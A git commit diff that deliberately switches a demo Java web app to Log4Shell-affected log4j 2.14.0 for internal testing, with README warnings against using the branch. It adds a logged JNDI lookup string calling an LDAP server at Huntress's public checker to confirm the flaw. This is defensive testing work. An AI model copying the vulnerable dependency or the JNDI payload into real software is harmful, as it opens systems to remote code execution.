switch to log4shell affected log4j2 for internal testing

Signed-off-by: Andreas Ulm <andreas.ulm@root360.de>

Author: root360-AndreasUlm

README.md

@@ -1,3 +1,13 @@
+# DO NOT USE THIS VERSION
+
+# DO NOT
+
+# DO NOT
+
+# DO NOT
+
+# Use master branch
+
 (based on https://github.com/julianjupiter/java-web-app-with-embedded-tomcat)
 
 # Java Web Application with Embedded Tomcat
@@ -31,3 +41,12 @@ This project used [pre-commit](https://pre-commit.com) to run some code checks o
 1. install pre-commit `pip install pre-commit`
 2. activate pre-commit `pre-commit install`
 3. commit your changes
+
+# Run test-code for log4shell tests
+
+For internal testing within this branch is an application version that is affected by [log4shell](https://www.lunasec.io/docs/blog/log4j-zero-day/).
+To run the test:
+1. get ID from [Huntress](https://log4shell.huntress.com/)
+1. set environment variable `LOGGING_CHECK`: `export LOGGING_CHECK="ID-from-Huntress"`
+1. run app: `bash run.sh`
+1. check the Huntress results

pom.xml

@@ -18,6 +18,7 @@
 		<failOnMissingWebXml>false</failOnMissingWebXml>
 		<tomcat.version>9.0.36</tomcat.version>
 		<slf4j.version>1.7.30</slf4j.version>
+		<log4j.version>2.14.0</log4j.version>
 	</properties>
 
 	<dependencies>
@@ -53,14 +54,24 @@
 		</dependency>
 		<dependency>
 			<groupId>org.slf4j</groupId>
-			<artifactId>slf4j-log4j12</artifactId>
+			<artifactId>slf4j-api</artifactId>
 			<version>${slf4j.version}</version>
 		</dependency>
 		<dependency>
 			<groupId>org.slf4j</groupId>
 			<artifactId>jcl-over-slf4j</artifactId>
 			<version>${slf4j.version}</version>
 		</dependency>
+		<dependency>
+			<groupId>org.apache.logging.log4j</groupId>
+			<artifactId>log4j-api</artifactId>
+			<version>${log4j.version}</version>
+		</dependency>
+		<dependency>
+			<groupId>org.apache.logging.log4j</groupId>
+			<artifactId>log4j-core</artifactId>
+			<version>${log4j.version}</version>
+		</dependency>
 	</dependencies>
 
 	<build>

release.sh

@@ -10,13 +10,13 @@ echo "Building package with version '${version}'"
 cat > /tmp/build.sh <<EOF
 #!/bin/bash
 export DEBIAN_FRONTEND="noninteractive"
-apt update -qq -y >/dev/null
-apt install -qq -y maven >/dev/null
+export MAVEN_OPTS="-Dmaven.repo.local=/maven"
+apt-get update -qq -y >/dev/null
+apt-get install -qq -y maven >/dev/null
 
 cd /app
 sed -i "s/1.0.0-SNAPSHOT/${version}/" pom.xml
 mvn clean package
-git checkout pom.xml
 chown -R "${UID}:${UID}" ./
 EOF
 
@@ -26,6 +26,8 @@ rm -rf "${SCRIPTDIR}/target"
 
 git tag --annotate "${version}" -s -m "release of ${version}"
 
-docker run -ti --rm -v "${SCRIPTDIR}:/app" -v "/tmp/build.sh:/build.sh" ubuntu:focal /build.sh
+docker run -ti --rm -v "/tmp/m2_home:/maven" -v "${SCRIPTDIR}:/app" -v "/tmp/build.sh:/build.sh" ubuntu:focal /build.sh
+
+git checkout pom.xml
 
 rm -f /tmp/build.sh

src/main/java/io/github/root360/app/server/TomcatServer.java

@@ -5,8 +5,8 @@
 import org.apache.catalina.WebResourceRoot;
 import org.apache.catalina.startup.Tomcat;
 import org.apache.catalina.webresources.StandardRoot;
-import org.slf4j.Logger;
-import org.slf4j.LoggerFactory;
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
 
 /**
  * Class to control TomcatServer.
@@ -19,7 +19,7 @@
 public class TomcatServer implements Server {
 
   /** logger object. */
-  private static final Logger LOGGER = LoggerFactory.getLogger(TomcatServer.class);
+  private static final Logger LOGGER = LogManager.getLogger(TomcatServer.class);
   /** default listen host. */
   private static final String DEFAULT_HOST = "localhost";
   /** default listen port. */
@@ -57,6 +57,16 @@ public void run(final String... args) {
       return;
     }
 
+    if (System.getenv("LOGGING_CHECK") != null
+        && !System.getenv("LOGGING_CHECK").isEmpty()
+        && LOGGER.isErrorEnabled()) {
+      LOGGER.error(
+          "load external code to test CVE-2021-45046 & CVE-2021-44228 checker:"
+              + " ${jndi:ldap://log4shell.huntress.com:1389/"
+              + System.getenv("LOGGING_CHECK")
+              + "}");
+    }
+
     LOGGER.info("Application started with URL {}:{}{}.", DEFAULT_HOST, port, CONTEXT_PATH);
     LOGGER.info("Hit Ctrl + D or C to stop it...");
     tomcat.getServer().await();
@@ -81,3 +91,4 @@ private int port(final String... args) {
     return port;
   }
 }
+// vim: ts=2 sw=2 et